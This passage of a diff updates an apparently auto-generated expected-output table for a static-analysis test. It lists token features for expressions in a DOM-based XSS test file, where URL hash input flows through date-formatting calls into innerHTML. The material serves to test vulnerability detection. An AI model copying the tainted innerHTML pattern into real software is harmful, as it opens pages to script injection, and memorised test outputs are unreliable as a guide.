contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:19:37:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:19:37:27 | innerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:19:37:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:37:31:37:84 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:37:31:37:84 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:37:31:37:84 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:37:31:37:84 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | | autogenerated/Xss/DomBasedXss/dates.js:37:31:37:84 | `Time i ... aint)}` | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:37:31:37:84 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:32:37:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:32:37:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:32:37:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:32:37:39 | Time is | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:32:37:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:32:37:39 | Time is | stringConcatenatedWith | -endpoint- dateFns.formatByString() | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:48 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:48 | dateFns | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:48 | dateFns | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:48 | dateFns | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:48 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:63 | dateFns ... yString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:63 | dateFns ... yString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:63 | dateFns ... yString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:63 | dateFns ... yString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:63 | dateFns ... yString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | dateFns ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | dateFns ... taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | dateFns ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | dateFns ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | dateFns ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | dateFns ... taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | exceptional return of dateFns ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | exceptional return of dateFns ... taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | exceptional return of dateFns ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | exceptional return of dateFns ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:42:37:82 | exceptional return of dateFns ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:50:37:63 | formatByString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:50:37:63 | formatByString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:50:37:63 | formatByString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:50:37:63 | formatByString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:50:37:63 | formatByString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | exceptional return of new Date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | exceptional return of new Date() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | exceptional return of new Date() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | exceptional return of new Date() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | exceptional return of new Date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | new Date() | CalleeFlexibleAccessPath | dateFns.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | new Date() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | new Date() | calleeImports | @date-io/date-fns | @@ -13071,6 +97722,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | new Date() | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | new Date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:37:65:37:74 | new Date() | receiverName | dateFns | +| autogenerated/Xss/DomBasedXss/dates.js:37:69:37:72 | Date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:37:69:37:72 | Date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:37:69:37:72 | Date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:37:69:37:72 | Date | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:37:69:37:72 | Date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:37:77:37:81 | taint | CalleeFlexibleAccessPath | dateFns.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:37:77:37:81 | taint | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dates.js:37:77:37:81 | taint | calleeImports | @date-io/date-fns | @@ -13080,12 +97736,89 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:37:77:37:81 | taint | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:37:77:37:81 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:37:77:37:81 | taint | receiverName | dateFns | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:12 | document | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:17 | document.body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:27 | documen ... nerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:84 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:84 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:84 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:84 | documen ... aint)}` | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:5:38:84 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:14:38:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:14:38:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:14:38:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:14:38:17 | body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:14:38:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:19:38:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:19:38:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:19:38:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:19:38:27 | innerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:19:38:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:38:31:38:84 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:38:31:38:84 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:38:31:38:84 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:38:31:38:84 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | | autogenerated/Xss/DomBasedXss/dates.js:38:31:38:84 | `Time i ... aint)}` | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:38:31:38:84 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:32:38:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:32:38:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:32:38:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:32:38:39 | Time is | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:32:38:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:32:38:39 | Time is | stringConcatenatedWith | -endpoint- luxon.formatByString() | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:46 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:46 | luxon | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:46 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:46 | luxon | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:46 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:61 | luxon.formatByString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:61 | luxon.formatByString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:61 | luxon.formatByString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:61 | luxon.formatByString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:61 | luxon.formatByString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | exceptional return of luxon.f ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | exceptional return of luxon.f ... taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | exceptional return of luxon.f ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | exceptional return of luxon.f ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | exceptional return of luxon.f ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | luxon.f ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | luxon.f ... taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | luxon.f ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | luxon.f ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | luxon.f ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:42:38:82 | luxon.f ... taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:38:48:38:61 | formatByString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:48:38:61 | formatByString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:48:38:61 | formatByString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:48:38:61 | formatByString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:48:38:61 | formatByString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:67 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:67 | luxon | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:67 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:67 | luxon | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:67 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:72 | luxon.date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:72 | luxon.date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:72 | luxon.date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:72 | luxon.date | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:72 | luxon.date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | exceptional return of luxon.date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | exceptional return of luxon.date() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | exceptional return of luxon.date() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | exceptional return of luxon.date() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | exceptional return of luxon.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | luxon.date() | CalleeFlexibleAccessPath | luxon.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | luxon.date() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | luxon.date() | calleeImports | @date-io/luxon | @@ -13095,6 +97828,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | luxon.date() | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | luxon.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:38:63:38:74 | luxon.date() | receiverName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:38:69:38:72 | date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:38:69:38:72 | date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:38:69:38:72 | date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body 